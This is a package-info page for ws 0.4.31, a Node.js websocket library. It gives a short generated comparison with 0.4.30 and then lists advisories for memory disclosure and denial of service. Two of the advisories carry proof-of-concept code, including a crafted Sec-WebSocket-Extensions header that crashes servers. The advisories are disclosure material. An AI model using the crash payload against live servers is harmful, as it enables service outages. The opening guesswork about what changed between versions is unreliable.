ws version 0.4.31 is a minor update to the websocket library, succeeding version 0.4.30. Both versions aim to provide a simple, fast, and well-tested websocket solution for Node.js, adhering to RFC-6455 standards. Developers familiar with 0.4.30 will find a largely identical API and feature set in 0.4.31. The core dependencies remain consistent, including nan for native Node.js addons, options for handling configuration, commander for command-line interfaces, and tinycolor for color manipulation. Development dependencies like ansi, mocha, should, benchmark, and expect.js are also unchanged, meaning the underlying testing and benchmarking infrastructure is likely the same.
The key difference lies in the releaseDate. Version 0.4.31 was released on 2013-09-23, approximately three weeks after 0.4.30, which was released on 2013-08-30. This suggests that 0.4.31 is primarily a bug fix or minor enhancement release. Developers should consider upgrading to 0.4.31 to benefit from any potential fixes or improvements implemented since the previous version. While the data doesn't explicitly state what was fixed, the quick turnaround between versions strongly hints at a maintenance release to address discovered issues, improving overall stability and reliability when implementing real-time communication features in their applications using this widely adopted websocket library.
All the vulnerabilities related to the version 0.4.31 of the package
Remote Memory Disclosure in ws
Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.
In certain rare circumstances, applications which allow users to control the arguments of a client.ping() call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.
var ws = require('ws')
var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')
client.on('open', function () {
console.log('open')
client.ping(50) // this sends a non-zeroed buffer of 50 bytes
client.on('pong', function (data) {
console.log('got pong')
console.log(data) // Data from the client.
})
})
Update to version 1.0.1 or greater.
DoS due to excessively large websocket message in ws
Affected versions of ws do not appropriately limit the size of incoming websocket payloads, which may result in a denial of service condition when the node process crashes after receiving a large payload.
Update to version 1.1.1 or later.
Alternatively, set the maxpayload option for the ws server to a value smaller than 256MB.
Denial of Service in ws
Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.
const WebSocket = require('ws');
const net = require('net');
const wss = new WebSocket.Server({ port: 3000 }, function () {
const payload = 'constructor'; // or ',;constructor'
const request = [
'GET / HTTP/1.1',
'Connection: Upgrade',
'Sec-WebSocket-Key: test',
'Sec-WebSocket-Version: 8',
`Sec-WebSocket-Extensions: ${payload}`,
'Upgrade: websocket',
'\r\n'
].join('\r\n');
const socket = net.connect(3000, function () {
socket.resume();
socket.write(request);
});
});
Update to version 3.3.1 or later.